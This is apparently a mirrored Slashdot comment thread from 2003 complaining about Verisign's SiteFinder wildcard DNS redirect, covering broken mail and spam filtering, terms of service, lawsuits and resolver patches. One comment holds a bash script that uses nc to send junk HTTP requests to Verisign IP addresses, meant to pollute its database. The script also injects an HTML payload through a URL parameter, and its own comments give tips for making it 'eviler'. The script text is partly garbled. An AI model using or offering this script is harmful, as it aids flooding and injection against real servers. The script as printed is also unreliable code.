Slashdot Mirror
Verisign Typosquatter Explorer
jelyon quotes Seth Finkelstein's website "I have written a program " Verisign Typosquatter Explorer" in order to examine [the Verisign] suggestions [for mistyped domains]. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice."
I mailed this little lot earlier today:
authenticode-support@verisign.com, billing@verisign.com, channel-partners@verisign.com, clientpki@verisign.com, consultingsolutions@verisign.com, dbms-support@verisign.com, dcpolicy@verisign.com, digitalbranding@verisign.com, dnssales@verisign.com, enterprise-pkisupport@verisign.com, enterprise-sslsupport@verisign.com, info@verisign-grs.com, internetsales@verisign.com, IR@verisign.com, jobs@verisign.com, mss@verisign.com, objectsigning-support@verisign.com, paymentsales@verisign.com, practices@verisign.com, premiersupport@networksolutions.com, press@verisign.com, privacy@networksolutions.com, renewal@verisign.com, support@verisign.com, verisales@verisign.com, vps-support@verisign.com, vts-csrgroup@verisign.com, vts-mktginfo@verisign.com, webhelp@verisign.com, websitesales@verisign.com, websitesupport@verisign.com
And I got a bunch of replies back, including *gasp* two written by actual human beings!
Remember folks, if you're going to write and complain, try and keep it civil. The porr bugger who hsa to read your complaint isn't the same person who actually took the decision to introduce sitefinder!
A little planning goes a long way...
So what do you do when you WANT to get a "domain cannot be found" error for troubleshooting purposes... I know it sounds weird, but this whole thing is very annoying.
R-
Hard loop..... huh?
Dynamic Designs
Hey, I'm outraged and mad too, like all of you.. but, I'm not seeing this. Maybe my ISPs have taken a stand with their DNS, but both my work and home ISPs? Unlikely. Why aren't I seeing this?
# Erik
How is this any different from me buying mispelled domains to profit off other company's trademarks? I know the Federal Government just tossed a guy in jail for doing the same thing. There is something that stinks to high heaven about this. It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.
Strange women lying in ponds distributing swords is no basis for a system of government.
What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?
Verisign's action was most probably intended for web traffic, where it's at least an annoyance. But since the DNS is an independent system from the web that's used by all sorts of services, it's undoubtedly breaking all sorts of non-web things out there that rely on knowing accurately if a domain name exists... not to mention all of the additional maintenance time. Email and spam filters are the two that seem to've been brought up a lot.
So far I've seen a lot of people getting mad and I am too, but I haven't seen anyone actually state how much they're losing due to the sudden change and breaking of standards by Verisign. Is anyone confident to put an amount on this?
Seriously, would it be possible for ISP's to file a class action suit? I have spent ALL day (so far) dealing with the repurcussions of this blatant misuse of authority. I know others out there are dealing with the same. I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured verisign was squatting on the domain, and thought they would have to pay verisign for the use of the domain.
On a side note...
Our mail servers are filling up with spam, and with the recent loss of SPEWS, our spam filtering system is basically useless.. save for the few other blacklist sites still out there. Spammers must be rejoicing today.
Fuck you VeriSign, Fuck you very much.
Everyone is entitled to their own opinion. It's just that yours is stupid.
Well, this is finally working for me now!
Man, did you check out their "terms of service"? That shit is hilarious!
" 14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference."
HOW THE FUCK AM I SUPPOSED TO READ AND AGREE TO BE BOUND TO TERMS, when I arrived at the site by mis-typing a domain name????
From the privacy policy:
"Under no circumstances do we collect any personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, health, or sex life."
No? What about when I go to any political site, sex site, health site, religious site, etc, and don't type the domain name correctly?
http://www.sitefinderreallyreallysucks.com/
Does anyone have any idea how an application (or even resolver) writer could workaround this?
All the solutions I've come up with can be defeated by having verisign rotate their IP addresses or domain (sitefinder.verisign.com)
What is BIND doing?
Martin Brooks / Slayer99 #linux / UIN 2178117
To the original poster: This is exactly why you don't use your /. id wrt to seth or michael. They are both insane, and it is better to stay out of it.
If Seth pooped on your front porch, and you complained, he'd probably say that the poop was made by an EFF PIONEER AWARD WINNING CYBERSECURITY ACTIVIST. Then, he'd apparently shoot you first, and ask questions later.
They are taking advantage of the fact that they run those servers and are driving traffic to their site in a monopolistic and predatory manner while breaking many relied-upon services that expect a certain response (NXDOMAIN) when a domain doesn't exist. The site design is irrelevant, and what they have done is essentially hijack the .com and .net domains and squat on EVERY unregistered domain name out there.
"Murphy was an optimist" - O'Toole's commentary on Murphy's Law
Somewhat off-topic, but relevant to the whole Verisign DNS idiocy... I have thrown up a database of patched nameservers here (don't worry about arouse.net, it's not a porn site), which currently allows you to check to see if a nameserver has been patched to block return of 'A' results for non-existent domains, and allows you to add to the database if it is a patched server.
OK, how about this one:
3 25 0
http://slashdot.org/article.pl?sid=03/09/16/192
It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition. Check out the picture of Trent Lott standing next to 360,000 pieces of paper. One of those is mine, and it looks like it carried some weight to me.
I went to school with Eli Pariser, btw -- he's one of the guys who runs MoveOn. Check out what else they've done to see how online activism can be effective.
#!/bin/bash
/${fakedom} HTTP/1.1
/lpc?url='%3E%3Cfont%20size=+5%20color=%23FF0000%3 E\
#
#Replace dumbwordlist if you like with nonsense
#that will be used to fill up Verisign's database
#with useless crap.
#To make it eviler, remove the $((RANDOM%10)) parts,
#or maybe wrap the inner loops with an outer loop that
#picks a random postfix and asks for all of the
#domains ending, with that prefix, 10 times or so.
#Since the stuff should get asked for repeatedly,
#maybe they'll get "false positives".
#
#Also note that this simulates the first request to
#the siteverifier page, which sends a redirect to the
#real page with the ads and links on it. We ignore it
#and send the second request, knowing full well what
#the first one looked like. Hopefully this "seems"
#legitimate on their end.
#
#Your ISP may have already null-routed 64.94.110.11;
#if so this script will hang with no output.
#To remedy, remove the first nc command (up to the first
# %%EOF%%). Leave the second one, as it appears
#that one is still visible. If both are invisible, your
#ISP has _really_ gone the distance to piss of Verisign
#
#Kudos!
dumbwordlist="rem0te br4nd sar1n flau7a mickst3r robbi3 ch3my jjopppl fuckkksl ncmaster df753 klopuier beeiosla cuntwh4ccker openinsertcl oofignet phaconspal qrrtioe sumnsan rx30sony popopospospposp llqksjajjq0 aslashji aklhjk3421 halff liveees ttooowo toowoo aslllkoq"
for each in $dumbwordlist;
do
for eachi in $dumbwordlist;
do fakedom=$each$((RANDOM%10))$eachi$((RANDOM%10));
nc 64.94.110.11 80 <<%%EOF%%
GET
Host: ${fakedom}.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
nc 12.158.80.10 80 <<%%EOF%%
GET
VERISIGN%20SUCKS%20MY%20${fakedom}%3C/font%3E HTTP/1.1
Host: sitefinder.verisign.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
done
done
Fuck Beta. Fuck Dice
Did anyone else notice this at the bottom of the site containing the messages?
"This page is maintained by the IAB Executive Director
Last modified 26 November, 2002."
And it depends on the content as well as the medium. My fax was original, business-like, and carefully-argued, though partly based on stuff available online. I suspect that originality, literacy, clarity, conciseness, and focus all count well, just as obvious copying, rambling, pointless emotion, length, and lack of focus will make a communication less likely to be read or acted upon. You need to state carefully but briefly the problem, the cause, what you're asking your representative to do, and why; if you do that politely, it'd be an inconsiderate person who didn't at least reply, whatever the medium.
I suspect that the reason online petitions often don't seem to count is less that they're online, and more that they're petitions; without a direct, personal request for action, any communication will have less weight.
Ceterum censeo subscriptionem esse delendam.
That's right, it won't work. You have to vote with your feet, or in this case, your electronic feet. If you are in charge of a DNS server, push to have it updated to block their slimy wildcarding. So what if Verisign changes something to get around the latest patch? BIND and friends will update again. Who is more likely to get tired of this game faster, the suits who have to go out to a three hour lunch and don't want to hear about how crappy their latest decision was, or the out of work hacker with a terminal in his face and caffeine flowing to the tips of his coding fingers? I worry that this will lead to a fractured mess of DNS versions and someone will come along with a worm to take advantage of coding mistakes made in a hurry to counter each move. That could be a good thing in that it would force everyone to bump up to the latest Verisign blocking version.
Remember, it's a free market, so Verisign can do as they will within the limits of the law. They'll just have to deal with more work now to counter each move we make. Hey, on the bright side, it might mean more jobs for programmers and admins if they decide to continue with this. Good luck Verisign!
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
For Atlas to shrug the creative people have to be people as greedy and self centered as Ayn Rand was.
There are a few libertarians who are involved in the forefront of Internet and Web research but not very many and I doubt that their contribution is irreplaceable.
The Web is really a piece of performance art, it kind of looses its point if nobody experiences it.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/